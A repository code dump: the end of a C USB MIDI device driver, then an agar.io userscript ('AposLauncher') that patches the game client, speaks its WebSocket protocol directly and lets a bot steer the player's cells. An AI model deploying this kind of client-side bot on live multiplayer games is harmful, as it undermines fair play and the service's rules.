USBD_LL_CloseEP(pdev,MIDI_IN_EP);
USBD_LL_CloseEP(pdev,MIDI_OUT_EP);
return 0;
}
static uint8_t USBD_MIDI_DataIn (USBD_HandleTypeDef *pdev, uint8_t epnum){
if (USB_Tx_State == 1){
USB_Tx_State = 0;
}
return USBD_OK;
}
static uint8_t USBD_MIDI_DataOut (USBD_HandleTypeDef *pdev, uint8_t epnum)
{
uint16_t USB_Rx_Cnt;
USBD_MIDI_ItfTypeDef *pmidi;
pmidi = (USBD_MIDI_ItfTypeDef *)(pdev->pUserData);
USB_Rx_Cnt = ((PCD_HandleTypeDef*)pdev->pData)->OUT_ep[epnum].xfer_count;
pmidi->pIf_MidiRx((uint8_t *)&USB_Rx_Buffer, USB_Rx_Cnt);
USBD_LL_PrepareReceive(pdev,MIDI_OUT_EP,(uint8_t*)(USB_Rx_Buffer),MIDI_DATA_OUT_PACKET_SIZE);
return USBD_OK;
}
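// Drain the APP_Rx ring buffer towards the IN endpoint: at most one packet
// (MIDI_DATA_IN_PACKET_SIZE bytes) is submitted per call, and USB_Tx_State
// prevents starting a new transfer while the previous one is still in flight.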
void USBD_MIDI_SendPacket (){
uint16_t USB_Tx_ptr;
uint16_t USB_Tx_length;
if(USB_Tx_State != 1){
if (APP_Rx_ptr_out == APP_RX_DATA_SIZE){
APP_Rx_ptr_out = 0;
}
if(APP_Rx_ptr_out == APP_Rx_ptr_in){
USB_Tx_State = 0;
return;
}
if(APP_Rx_ptr_out > APP_Rx_ptr_in){
APP_Rx_length = APP_RX_DATA_SIZE - APP_Rx_ptr_out;
}else{
APP_Rx_length = APP_Rx_ptr_in - APP_Rx_ptr_out;
}
if (APP_Rx_length > MIDI_DATA_IN_PACKET_SIZE){
USB_Tx_ptr = APP_Rx_ptr_out;
USB_Tx_length = MIDI_DATA_IN_PACKET_SIZE;
APP_Rx_ptr_out += MIDI_DATA_IN_PACKET_SIZE;
APP_Rx_length -= MIDI_DATA_IN_PACKET_SIZE;
}else{
USB_Tx_ptr = APP_Rx_ptr_out;
USB_Tx_length = APP_Rx_length;
APP_Rx_ptr_out += APP_Rx_length;
APP_Rx_length = 0;
}
USB_Tx_State = 1;
USBD_LL_Transmit (pInstance, MIDI_IN_EP,(uint8_t*)&APP_Rx_Buffer[USB_Tx_ptr],USB_Tx_length);
}
}
static uint8_t *USBD_MIDI_GetCfgDesc (uint16_t *length){
*length = sizeof (USBD_MIDI_CfgDesc);
return USBD_MIDI_CfgDesc;
}
//uint8_t *USBD_MIDI_GetDeviceQualifierDescriptor (uint16_t *length){
// *length = sizeof (USBD_MIDI_DeviceQualifierDesc);
// return USBD_MIDI_DeviceQualifierDesc;
//}
uint8_t USBD_MIDI_RegisterInterface(USBD_HandleTypeDef *pdev, USBD_MIDI_ItfTypeDef *fops)
{
uint8_t ret = USBD_FAIL;
if(fops != NULL){
pdev->pUserData= fops;
ret = USBD_OK;
}
return ret;
}
| konosubakonoakua/pcbtc |
<|start_filename|>launcher.user.js<|end_filename|>
/*The MIT License (MIT)
Copyright (c) 2015 Apostolique
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.*/
// ==UserScript==
// @name AposLauncher
// @namespace AposLauncher
// @include http://agar.io/*
// @version 3.068
// @grant none
// @author http://www.twitch.tv/apostolique
// ==/UserScript==
var aposLauncherVersion = 3.068;
Number.prototype.mod = function(n) {
return ((this % n) + n) % n;
};
Array.prototype.peek = function() {
return this[this.length - 1];
}
var sha = "efde0488cc2cc176db48dd23b28a20b90314352b";
function getLatestCommit() {
window.jQuery.ajax({
url: "https://api.github.com/repos/agariotool/agariobot/git/refs/heads/master",
cache: false,
dataType: "jsonp"
}).done(function(data) {
console.dir(data["data"])
console.log("hmm: " + data["data"]["object"]["sha"]);
sha = data["data"]["object"]["sha"];
function update(prefix, name, url) {
window.jQuery(document.body).prepend("<div id='" + prefix + "Dialog' style='position: absolute; left: 0px; right: 0px; top: 0px; bottom: 0px; z-index: 100; display: none;'>");
window.jQuery('#' + prefix + 'Dialog').append("<div id='" + prefix + "Message' style='width: 350px; background-color: #FFFFFF; margin: 100px auto; border-radius: 15px; padding: 5px 15px 5px 15px;'>");
window.jQuery('#' + prefix + 'Message').append("<h2>UPDATE TIME!!!</h2>");
window.jQuery('#' + prefix + 'Message').append("<p>Grab the update for: <a id='" + prefix + "Link' href='" + url + "' target=\"_blank\">" + name + "</a></p>");
window.jQuery('#' + prefix + 'Link').on('click', function() {
window.jQuery("#" + prefix + "Dialog").hide();
window.jQuery("#" + prefix + "Dialog").remove();
});
window.jQuery("#" + prefix + "Dialog").show();
}
window.jQuery.get('https://raw.githubusercontent.com/agariotool/agariobot/master/launcher.user.js?' + Math.floor((Math.random() * 1000000) + 1), function(data) {
var latestVersion = data.replace(/(\r\n|\n|\r)/gm, "");
latestVersion = latestVersion.substring(latestVersion.indexOf("// @version") + 11, latestVersion.indexOf("// @grant"));
latestVersion = parseFloat(latestVersion + 0.0000);
var myVersion = parseFloat(aposLauncherVersion + 0.0000);
if (latestVersion > myVersion) {
update("aposLauncher", "launcher.user.js", "hhttps://github.com/agariotool/agariobot/blob/" + sha + "/launcher.user.js/");
}
console.log('Current launcher.user.js Version: ' + myVersion + " on Github: " + latestVersion);
});
}).fail(function() {});
}
getLatestCommit();
console.log("Running Bot Launcher!");
(function(d, e) {
//UPDATE
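// Hotkeys: T toggles the bot, R toggles overlay drawing, S cycles the
// selected cell, D switches the dark theme, F toggles mass display,
// E toggles the stream message, Q toggles mouse-follow mode.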
function keyAction(e) {
if (84 == e.keyCode) {
console.log("Toggle");
toggle = !toggle;
}
if (82 == e.keyCode) {
console.log("ToggleDraw");
toggleDraw = !toggleDraw;
}
if (83 == e.keyCode) {
selectedCell = (selectedCell + 1).mod(getPlayer().length + 1);
console.log("Next Cell " + selectedCell);
}
if (68 == e.keyCode) {
window.setDarkTheme(!getDarkBool());
}
if (70 == e.keyCode) {
window.setShowMass(!getMassBool());
}
if (69 == e.keyCode) {
if (message.length > 0) {
window.setMessage([]);
window.onmouseup = function() {};
window.ignoreStream = true;
} else {
window.ignoreStream = false;
window.refreshTwitch();
}
}
if (81 == e.keyCode) {
console.log("ToggleFollowMouse");
toggleFollow = !toggleFollow;
}
}
function humanPlayer() {
//Don't need to do anything.
var player = getPlayer();
var destination = [];
for (var i = 0; i < player.length; i++) {
destination.push([getPointX(), getPointY()])
}
return destination;
}
function pb() {
//UPDATE
if (window.botList == null) {
window.botList = [];
window.jQuery('#locationUnknown').append(window.jQuery('<select id="bList" class="form-control" onchange="setBotIndex($(this).val());" />'));
window.jQuery('#locationUnknown').addClass('form-group');
}
window.jQuery('#nick').val(originalName);
if (window.botList.length == 0) {
window.botList.push(["Human", humanPlayer]);
var bList = window.jQuery('#bList');
window.jQuery('<option />', {
value: (window.botList.length - 1),
text: "Human"
}).appendTo(bList);
}
ya = !0;
Pa();
setInterval(Pa, 18E4);
var father = window.jQuery("#canvas").parent();
window.jQuery("#canvas").remove();
father.prepend("<canvas id='canvas'>");
G = za = document.getElementById("canvas");
f = G.getContext("2d");
G.onmousedown = function(a) {
if (Qa) {
var b = a.clientX - (5 + m / 5 / 2),
c = a.clientY - (5 + m / 5 / 2);
if (Math.sqrt(b * b + c * c) <= m / 5 / 2) {
V();
H(17);
return
}
}
fa = a.clientX;
ga = a.clientY;
Aa();
V();
};
G.onmousemove = function(a) {
fa = a.clientX;
ga = a.clientY;
Aa();
};
G.onmouseup = function() {};
/firefox/i.test(navigator.userAgent) ? document.addEventListener("DOMMouseScroll", Ra, !1) : document.body.onmousewheel = Ra;
var a = !1,
b = !1,
c = !1;
d.onkeydown = function(l) {
//UPDATE
if (!window.jQuery('#nick').is(":focus")) {
32 != l.keyCode || a || (V(), H(17), a = !0);
81 != l.keyCode || b || (H(18), b = !0);
87 != l.keyCode || c || (V(), H(21), c = !0);
27 == l.keyCode && Sa(!0);
//UPDATE
keyAction(l);
}
};
d.onkeyup = function(l) {
32 == l.keyCode && (a = !1);
87 == l.keyCode && (c = !1);
81 == l.keyCode && b && (H(19), b = !1);
};
d.onblur = function() {
H(19);
c = b = a = !1
};
d.onresize = Ta;
d.requestAnimationFrame(Ua);
setInterval(V, 40);
y && e("#region").val(y);
Va();
ha(e("#region").val());
0 == Ba && y && I();
W = !0;
e("#overlays").show();
Ta();
d.location.hash && 6 <= d.location.hash.length && Wa(d.location.hash)
}
function Ra(a) {
J *= Math.pow(.9, a.wheelDelta / -120 || a.detail || 0);
//UPDATE
0.07 > J && (J = 0.07);
J > 4 / h && (J = 4 / h)
}
function qb() {
if (.4 > h) X = null;
else {
for (var a = Number.POSITIVE_INFINITY, b = Number.POSITIVE_INFINITY, c = Number.NEGATIVE_INFINITY, l = Number.NEGATIVE_INFINITY, d = 0, p = 0; p < v.length; p++) {
var g = v[p];
!g.N() || g.R || 20 >= g.size * h || (d = Math.max(g.size, d), a = Math.min(g.x, a), b = Math.min(g.y, b), c = Math.max(g.x, c), l = Math.max(g.y, l))
}
X = rb.ka({
ca: a - 10,
da: b - 10,
oa: c + 10,
pa: l + 10,
ma: 2,
na: 4
});
for (p = 0; p < v.length; p++)
if (g = v[p],
g.N() && !(20 >= g.size * h))
for (a = 0; a < g.a.length; ++a) b = g.a[a].x, c = g.a[a].y, b < s - m / 2 / h || c < t - r / 2 / h || b > s + m / 2 / h || c > t + r / 2 / h || X.m(g.a[a])
}
}
function Aa() {
//UPDATE
if (selectedCell > 0 && selectedCell <= getPlayer().length) {
setPoint(((fa - m / 2) / h + s), ((ga - r / 2) / h + t), selectedCell - 1);
drawCircle(getPlayer()[selectedCell - 1].x, getPlayer()[selectedCell - 1].y, getPlayer()[selectedCell - 1].size, 8);
drawCircle(getPlayer()[selectedCell - 1].x, getPlayer()[selectedCell - 1].y, getPlayer()[selectedCell - 1].size / 2, 8);
} else if (selectedCell > getPlayer().length) {
selectedCell = 0;
}
if (toggle || window.botList[botIndex][0] == "Human") {
var startIndex = (selectedCell == 0 ? 0 : selectedCell - 1);
for (var i = 0; i < getPlayer().length - (selectedCell == 0 ? 0 : 1); i++) {
setPoint(((fa - m / 2) / h + s) + i, ((ga - r / 2) / h + t) + i, (i + startIndex).mod(getPlayer().length));
}
}
}
function Pa() {
null == ka && (ka = {}, e("#region").children().each(function() {
var a = e(this),
b = a.val();
b && (ka[b] = a.text())
}));
e.get("https://m.agar.io/info", function(a) {
var b = {},
c;
for (c in a.regions) {
var l = c.split(":")[0];
b[l] = b[l] || 0;
b[l] += a.regions[c].numPlayers
}
for (c in b) e('#region option[value="' + c + '"]').text(ka[c] + " (" + b[c] + " players)")
},
"json")
}
function Xa() {
e("#adsBottom").hide();
e("#overlays").hide();
W = !1;
Va();
d.googletag && d.googletag.pubads && d.googletag.pubads().clear(d.aa)
}
function ha(a) {
a && a != y && (e("#region").val() != a && e("#region").val(a), y = d.localStorage.location = a, e(".region-message").hide(), e(".region-message." + a).show(), e(".btn-needs-server").prop("disabled", !1), ya && I())
}
function Sa(a) {
W || (K = null, sb(), a && (x = 1), W = !0, e("#overlays").fadeIn(a ? 200 : 3E3))
}
function Y(a) {
e("#helloContainer").attr("data-gamemode", a);
P = a;
e("#gamemode").val(a)
}
function Va() {
e("#region").val() ? d.localStorage.location = e("#region").val() : d.localStorage.location && e("#region").val(d.localStorage.location);
e("#region").val() ? e("#locationKnown").append(e("#region")) : e("#locationUnknown").append(e("#region"))
}
function sb() {
la && (la = !1, setTimeout(function() {
la = !0
//UPDATE
}, 6E4 * Ya))
}
function Z(a) {
return d.i18n[a] || d.i18n_dict.en[a] || a
}
function Za() {
var a = ++Ba;
console.log("Find " + y + P);
e.ajax("https://m.agar.io/findServer", {
error: function() {
setTimeout(Za, 1E3)
},
success: function(b) {
a == Ba && (b.alert && alert(b.alert), Ca("ws://" + b.ip, b.token))
},
dataType: "json",
method: "POST",
cache: !1,
crossDomain: !0,
data: (y + P || "?") + "\n154669603"
})
}
function I() {
ya && y && (e("#connecting").show(), Za())
}
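// Open the game WebSocket: tear down any previous socket, reset the local
// world state, then send the protocol handshake (opcodes 254 and 255,
// followed by the connection token via opcode 80) once the socket opens.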
function Ca(a, b) {
if (q) {
q.onopen = null;
q.onmessage = null;
q.onclose = null;
try {
q.close()
} catch (c) {}
q = null
}
Da.la && (a = "ws://" + Da.la);
if (null != L) {
var l = L;
L = function() {
l(b)
}
}
if (tb) {
var d = a.split(":");
a = d[0] + "s://ip-" + d[1].replace(/\./g, "-").replace(/\//g, "") + ".tech.agar.io:" + (+d[2] + 2E3)
}
M = [];
k = [];
E = {};
v = [];
Q = [];
F = [];
z = A = null;
R = 0;
$ = !1;
console.log("Connecting to " + a);
//UPDATE
serverIP = a;
q = new WebSocket(a);
q.binaryType = "arraybuffer";
q.onopen = function() {
var a;
console.log("socket open");
a = N(5);
a.setUint8(0, 254);
a.setUint32(1, 5, !0);
O(a);
a = N(5);
a.setUint8(0, 255);
a.setUint32(1, 154669603, !0);
O(a);
a = N(1 + b.length);
a.setUint8(0, 80);
for (var c = 0; c < b.length; ++c) a.setUint8(c + 1, b.charCodeAt(c));
O(a);
$a()
};
q.onmessage = ub;
q.onclose = vb;
q.onerror = function() {
console.log("socket error")
}
}
function N(a) {
return new DataView(new ArrayBuffer(a))
}
function O(a) {
q.send(a.buffer)
}
function vb() {
$ && (ma = 500);
console.log("socket close");
setTimeout(I, ma);
ma *= 2
}
function ub(a) {
wb(new DataView(a.data))
}
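// Dispatch an incoming packet on its first byte: 16 world update, 17 view
// position/zoom, 20 clear cells, 21 pointer coords, 32 own-cell id,
// 49/50 leaderboards, 64 map borders, 81 deferred stats (names informal).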
function wb(a) {
function b() {
for (var b = "";;) {
var d = a.getUint16(c, !0);
c += 2;
if (0 == d) break;
b += String.fromCharCode(d)
}
return b
}
var c = 0;
240 == a.getUint8(c) && (c += 5);
switch (a.getUint8(c++)) {
case 16:
xb(a, c);
break;
case 17:
aa = a.getFloat32(c, !0);
c += 4;
ba = a.getFloat32(c, !0);
c += 4;
ca = a.getFloat32(c, !0);
c += 4;
break;
case 20:
k = [];
M = [];
break;
case 21:
Ea = a.getInt16(c, !0);
c += 2;
Fa = a.getInt16(c, !0);
c += 2;
Ga || (Ga = !0, na = Ea, oa = Fa);
break;
case 32:
M.push(a.getUint32(c, !0));
c += 4;
break;
case 49:
if (null != A) break;
var l = a.getUint32(c, !0),
c = c + 4;
F = [];
for (var d = 0; d < l; ++d) {
var p = a.getUint32(c, !0),
c = c + 4;
F.push({
id: p,
name: b()
})
}
ab();
break;
case 50:
A = [];
l = a.getUint32(c, !0);
c += 4;
for (d = 0; d < l; ++d) A.push(a.getFloat32(c, !0)), c += 4;
ab();
break;
case 64:
pa = a.getFloat64(c, !0);
c += 8;
qa = a.getFloat64(c, !0);
c += 8;
ra = a.getFloat64(c, !0);
c += 8;
sa = a.getFloat64(c, !0);
c += 8;
aa = (ra + pa) / 2;
ba = (sa + qa) / 2;
ca = 1;
0 == k.length && (s = aa, t = ba, h = ca);
break;
case 81:
var g = a.getUint32(c, !0),
c = c + 4,
e = a.getUint32(c, !0),
c = c + 4,
f = a.getUint32(c, !0),
c = c + 4;
setTimeout(function() {
S({
e: g,
f: e,
d: f
})
}, 1200)
}
}
function xb(a, b) {
bb = C = Date.now();
$ || ($ = !0, e("#connecting").hide(), cb(), L && (L(), L = null));
var c = Math.random();
Ha = !1;
var d = a.getUint16(b, !0);
b += 2;
for (var u = 0; u < d; ++u) {
var p = E[a.getUint32(b, !0)],
g = E[a.getUint32(b + 4, !0)];
b += 8;
p && g && (g.X(), g.s = g.x, g.t = g.y, g.r = g.size, g.J = p.x, g.K = p.y, g.q = g.size, g.Q =
C)
}
for (u = 0;;) {
d = a.getUint32(b, !0);
b += 4;
if (0 == d) break;
++u;
var f, p = a.getInt16(b, !0);
b += 4;
g = a.getInt16(b, !0);
b += 4;
f = a.getInt16(b, !0);
b += 2;
for (var h = a.getUint8(b++), w = a.getUint8(b++), m = a.getUint8(b++), h = (h << 16 | w << 8 | m).toString(16); 6 > h.length;) h = "0" + h;
var h = "#" + h,
w = a.getUint8(b++),
m = !!(w & 1),
r = !!(w & 16);
w & 2 && (b += 4);
w & 4 && (b += 8);
w & 8 && (b += 16);
for (var q, n = "";;) {
q = a.getUint16(b, !0);
b += 2;
if (0 == q) break;
n += String.fromCharCode(q)
}
q = n;
n = null;
E.hasOwnProperty(d) ? (n = E[d], n.P(), n.s = n.x, n.t = n.y, n.r = n.size, n.color = h) :
(n = new da(d, p, g, f, h, q), v.push(n), E[d] = n, n.ua = p, n.va = g);
n.h = m;
n.n = r;
n.J = p;
n.K = g;
n.q = f;
n.sa = c;
n.Q = C;
n.ba = w;
q && n.B(q); - 1 != M.indexOf(d) && -1 == k.indexOf(n) && (document.getElementById("overlays").style.display = "none", k.push(n), 1 == k.length && (s = n.x, t = n.y, db()))
//UPDATE
interNodes[d] = window.getCells()[d];
}
//UPDATE
Object.keys(interNodes).forEach(function(element, index) {
//console.log("start: " + interNodes[element].updateTime + " current: " + D + " life: " + (D - interNodes[element].updateTime));
var isRemoved = !window.getCells().hasOwnProperty(element);
if (isRemoved && (window.getLastUpdate() - interNodes[element].getUptimeTime()) > 3000) {
delete interNodes[element];
} else {
for (var i = 0; i < getPlayer().length; i++) {
if (isRemoved && computeDistance(getPlayer()[i].x, getPlayer()[i].y, interNodes[element].x, interNodes[element].y) < getPlayer()[i].size + 710) {
delete interNodes[element];
break;
}
}
}
});
c = a.getUint32(b, !0);
b += 4;
for (u = 0; u < c; u++) d = a.getUint32(b, !0), b += 4, n = E[d], null != n && n.X();
//UPDATE
//Ha && 0 == k.length && Sa(!1)
}
//UPDATE
function computeDistance(x1, y1, x2, y2) {
var xdis = x1 - x2; // <--- FAKE AmS OF COURSE!
var ydis = y1 - y2;
var distance = Math.sqrt(xdis * xdis + ydis * ydis);
return distance;
}
function screenDistance() {
return Math.min(computeDistance(getOffsetX(), getOffsetY(), screenToGameX(getWidth()), getOffsetY()), computeDistance(getOffsetX(), getOffsetY(), getOffsetX(), screenToGameY(getHeight())));
}
window.verticalDistance = function() {
return computeDistance(screenToGameX(0), screenToGameY(0), screenToGameX(getWidth()), screenToGameY(getHeight()));
}
function screenToGameX(x) {
return (x - getWidth() / 2) / getRatio() + getX();
}
function screenToGameY(y) {
return (y - getHeight() / 2) / getRatio() + getY();
}
window.drawPoint = function(x_1, y_1, drawColor, text) {
if (!toggleDraw) {
dPoints.push([x_1, y_1, drawColor]);
dText.push(text);
}
}
window.drawArc = function(x_1, y_1, x_2, y_2, x_3, y_3, drawColor) {
if (!toggleDraw) {
var radius = computeDistance(x_1, y_1, x_3, y_3);
dArc.push([x_1, y_1, x_2, y_2, x_3, y_3, radius, drawColor]);
}
}
window.drawLine = function(x_1, y_1, x_2, y_2, drawColor) {
if (!toggleDraw) {
lines.push([x_1, y_1, x_2, y_2, drawColor]);
}
}
window.drawCircle = function(x_1, y_1, radius, drawColor) {
if (!toggleDraw) {
circles.push([x_1, y_1, radius, drawColor]);
}
}
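// Periodic send tick: respawns the bot when no cells are left, then sends an
// opcode-16 move packet (target x/y plus cell id) for every owned cell.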
function V() {
//UPDATE
if (getPlayer().length == 0 && !reviving && ~~(getCurrentScore() / 100) > 0) {
console.log("Dead: " + ~~(getCurrentScore() / 100));
apos('send', 'pageview');
}
if (getPlayer().length == 0) {
console.log("Revive");
setNick(originalName);
reviving = true;
} else if (getPlayer().length > 0 && reviving) {
reviving = false;
console.log("Done Reviving!");
}
if (T()) {
var a = fa - m / 2;
var b = ga - r / 2;
for (var i = 0; i < getPlayer().length; i++) {
var tempID = getPlayer()[i].id;
64 > a * a + b * b || .01 > Math.abs(eb - ia[i]) &&
.01 > Math.abs(fb - ja[i]) || (eb = ia[i], fb = ja[i], a = N(13), a.setUint8(0, 16), a.setInt32(1, ia[i], !0), a.setInt32(5, ja[i], !0), a.setUint32(9, tempID, !0), O(a))
}
}
}
function cb() {
if (T() && $ && null != K) {
var a = N(1 + 2 * K.length);
a.setUint8(0, 0);
for (var b = 0; b < K.length; ++b) a.setUint16(1 + 2 * b, K.charCodeAt(b), !0);
O(a)
}
}
function T() {
return null != q && q.readyState == q.OPEN
}
window.opCode = function(a) {
console.log("Sending op code.");
H(parseInt(a));
}
function H(a) {
if (T()) {
var b = N(1);
b.setUint8(0, a);
O(b)
}
}
function $a() {
if (T() && null != B) {
var a = N(1 + B.length);
a.setUint8(0, 81);
for (var b = 0; b < B.length; ++b) a.setUint8(b + 1, B.charCodeAt(b));
O(a)
}
}
function Ta() {
m = d.innerWidth;
r = d.innerHeight;
za.width = G.width = m;
za.height = G.height = r;
var a = e("#helloContainer");
a.css("transform", "none");
var b = a.height(),
c = d.innerHeight;
b > c / 1.1 ? a.css("transform", "translate(-50%, -50%) scale(" + c / b / 1.1 + ")") : a.css("transform", "translate(-50%, -50%)");
gb()
}
function hb() {
var a;
a = Math.max(r / 1080, m / 1920);
return a *= J
}
function yb() {
if (0 != k.length) {
for (var a = 0, b = 0; b < k.length; b++) a += k[b].size;
a = Math.pow(Math.min(64 / a, 1), .4) * hb();
h = (9 * h + a) / 10
}
}
function gb() {
//UPDATE
dPoints = [];
circles = [];
dArc = [];
dText = [];
lines = [];
var a, b = Date.now();
++zb;
C = b;
if (0 < k.length) {
yb();
for (var c = a = 0, d = 0; d < k.length; d++) k[d].P(), a += k[d].x / k.length, c += k[d].y / k.length;
aa = a;
ba = c;
ca = h;
s = (s + a) / 2;
t = (t + c) / 2;
} else s = (29 * s + aa) / 30, t = (29 * t + ba) / 30, h = (9 * h + ca * hb()) / 10;
qb();
Aa();
Ia || f.clearRect(0, 0, m, r);
Ia ? (f.fillStyle = ta ? "#111111" : "#F2FBFF", f.globalAlpha = .05, f.fillRect(0, 0, m, r), f.globalAlpha = 1) : Ab();
v.sort(function(a, b) {
return a.size == b.size ? a.id - b.id : a.size - b.size
});
f.save();
f.translate(m / 2, r / 2);
f.scale(h, h);
f.translate(-s, -t);
//UPDATE
f.save();
f.beginPath();
f.lineWidth = 5;
f.strokeStyle = "#FFFFFF";
f.moveTo(getMapStartX(), getMapStartY());
f.lineTo(getMapStartX(), getMapEndY());
f.stroke();
f.moveTo(getMapStartX(), getMapStartY());
f.lineTo(getMapEndX(), getMapStartY());
f.stroke();
f.moveTo(getMapEndX(), getMapStartY());
f.lineTo(getMapEndX(), getMapEndY());
f.stroke();
f.moveTo(getMapStartX(), getMapEndY());
f.lineTo(getMapEndX(), getMapEndY());
f.stroke();
f.restore();
for (d = 0; d < v.length; d++) v[d].w(f);
for (d = 0; d < Q.length; d++) Q[d].w(f);
//UPDATE
if (getPlayer().length > 0) {
var moveLoc = window.botList[botIndex][1](toggleFollow);
if (selectedCell > 0) {
Aa();
}
if (!toggle) {
var startIndex = (selectedCell == 0 ? 0 : selectedCell);
for (var i = 0; i < getPlayer().length - (selectedCell == 0 ? 0 : 1); i++) {
var cellIdx = (i + startIndex).mod(getPlayer().length);
setPoint(moveLoc[cellIdx][0], moveLoc[cellIdx][1], cellIdx);
}
}
}
customRender(f);
if (Ga) {
na = (3 * na + Ea) / 4;
oa = (3 * oa + Fa) / 4;
f.save();
f.strokeStyle = "#FFAAAA";
f.lineWidth = 10;
f.lineCap = "round";
f.lineJoin = "round";
f.globalAlpha = .5;
f.beginPath();
for (d = 0; d < k.length; d++) f.moveTo(k[d].x, k[d].y), f.lineTo(na, oa);
f.stroke();
f.restore();
}
f.restore();
z && z.width && f.drawImage(z, m - z.width - 10, 10);
R = Math.max(R, Bb());
//UPDATE
var currentDate = new Date();
var nbSeconds = 0;
if (getPlayer().length > 0) {
//nbSeconds = currentDate.getSeconds() + currentDate.getMinutes() * 60 + currentDate.getHours() * 3600 - lifeTimer.getSeconds() - lifeTimer.getMinutes() * 60 - lifeTimer.getHours() * 3600;
nbSeconds = (currentDate.getTime() - lifeTimer.getTime())/1000;
}
bestTime = Math.max(nbSeconds, bestTime);
var displayText = 'Score: ' + ~~(R / 100) + " Current Time: " + nbSeconds + " seconds.";
0 != R && (null == ua && (ua = new va(24, "#FFFFFF")), ua.C(displayText), c = ua.L(), a = c.width, f.globalAlpha = .2, f.fillStyle = "#000000", f.fillRect(10, r - 10 - 24 - 10, a + 10, 34), f.globalAlpha = 1, f.drawImage(c, 15, r -
10 - 24 - 5));
Cb();
b = Date.now() - b;
b > 1E3 / 60 ? D -= .01 : b < 1E3 / 65 && (D += .01);.4 > D && (D = .4);
1 < D && (D = 1);
b = C - ib;
!T() || W ? (x += b / 2E3, 1 < x && (x = 1)) : (x -= b / 300, 0 > x && (x = 0));
0 < x && (f.fillStyle = "#000000", f.globalAlpha = .5 * x, f.fillRect(0, 0, m, r), f.globalAlpha = 1);
ib = C
drawStats(f);
}
//UPDATE
function customRender(d) {
var palette = ["#FF0000", "#00FF00", "#0000FF", "#FF8000", "#8A2BE2", "#FF69B4", "#008080", "#FFFFFF"];
var pointPalette = ["black", "yellow", "blue", "red", "#008080", "#FF69B4"];
d.save();
for (var i = 0; i < lines.length; i++) {
d.beginPath();
d.lineWidth = 5;
d.strokeStyle = palette[lines[i][4]] || "#000000";
d.moveTo(lines[i][0], lines[i][1]);
d.lineTo(lines[i][2], lines[i][3]);
d.stroke();
}
d.restore();
d.save();
for (var i = 0; i < circles.length; i++) {
d.strokeStyle = palette[circles[i][3]] || "#000000";
d.beginPath();
d.lineWidth = 10;
//d.setLineDash([5]);
d.globalAlpha = 0.3;
d.arc(circles[i][0], circles[i][1], circles[i][2], 0, 2 * Math.PI, false);
d.stroke();
}
d.restore();
d.save();
for (var i = 0; i < dArc.length; i++) {
d.strokeStyle = palette[dArc[i][7]] || "#000000";
d.beginPath();
d.lineWidth = 5;
var ang1 = Math.atan2(dArc[i][1] - dArc[i][5], dArc[i][0] - dArc[i][4]);
var ang2 = Math.atan2(dArc[i][3] - dArc[i][5], dArc[i][2] - dArc[i][4]);
d.arc(dArc[i][4], dArc[i][5], dArc[i][6], ang1, ang2, false);
d.stroke();
}
d.restore();
d.save();
for (var i = 0; i < dPoints.length; i++) {
if (dText[i] == "") {
var radius = 10;
d.beginPath();
d.arc(dPoints[i][0], dPoints[i][1], radius, 0, 2 * Math.PI, false);
d.fillStyle = pointPalette[dPoints[i][2]] || "#000000";
d.fill();
d.lineWidth = 2;
d.strokeStyle = '#003300';
d.stroke();
} else {
var text = new va(18, (getDarkBool() ? '#F2FBFF' : '#111111'), true, '#000000');
text.C(dText[i]);
var textRender = text.L();
d.drawImage(textRender, dPoints[i][0], dPoints[i][1]);
}
}
d.restore();
}
function drawStats(d) {
d.save();
sessionScore = Math.max(getCurrentScore(), sessionScore);
var debugStrings = [];
debugStrings.push("Current Bot: " + window.botList[botIndex][0]);
debugStrings.push("T - Bot: " + (!toggle ? "On" : "Off"));
debugStrings.push("R - Lines: " + (!toggleDraw ? "On" : "Off"));
debugStrings.push("Q - Follow Mouse: " + (toggleFollow ? "On" : "Off"));
debugStrings.push("S - Manual Cell: " + (selectedCell == 0 ? "None" : selectedCell) + " of " + getPlayer().length);
debugStrings.push("");
debugStrings.push("Best Score: " + ~~(sessionScore / 100));
debugStrings.push("Best Time: " + bestTime + " seconds");
debugStrings.push("");
debugStrings.push(serverIP);
if (getPlayer().length > 0) {
var offsetX = -getMapStartX();
var offsetY = -getMapStartY();
debugStrings.push("Location: " + Math.floor(getPlayer()[0].x + offsetX) + ", " + Math.floor(getPlayer()[0].y + offsetY));
}
var offsetValue = 20;
var text = new va(18, (getDarkBool() ? '#F2FBFF' : '#111111'));
for (var i = 0; i < debugStrings.length; i++) {
text.C(debugStrings[i]);
var textRender = text.L();
d.drawImage(textRender, 20, offsetValue);
offsetValue += textRender.height;
}
if (message.length > 0) {
var mRender = [];
var mWidth = 0;
var mHeight = 0;
for (var i = 0; i < message.length; i++) {
var mText = new va(28, '#FF0000', true, '#000000');
mText.C(message[i]);
mRender.push(mText.L());
if (mRender[i].width > mWidth) {
mWidth = mRender[i].width;
}
mHeight += mRender[i].height;
}
var mX = getWidth() / 2 - mWidth / 2;
var mY = 20;
d.globalAlpha = 0.4;
d.fillStyle = '#000000';
d.fillRect(mX - 10, mY - 10, mWidth + 20, mHeight + 20);
d.globalAlpha = 1;
var mOffset = mY;
for (var i = 0; i < mRender.length; i++) {
d.drawImage(mRender[i], getWidth() / 2 - mRender[i].width / 2, mOffset);
mOffset += mRender[i].height;
}
}
d.restore();
}
function Ab() {
f.fillStyle = ta ? "#111111" : "#F2FBFF";
f.fillRect(0, 0, m, r);
f.save();
f.strokeStyle = ta ? "#AAAAAA" : "#000000";
f.globalAlpha = .2 * h;
for (var a = m / h, b = r / h, c = (a / 2 - s) % 50; c < a; c += 50) f.beginPath(), f.moveTo(c * h - .5, 0), f.lineTo(c * h - .5, b * h), f.stroke();
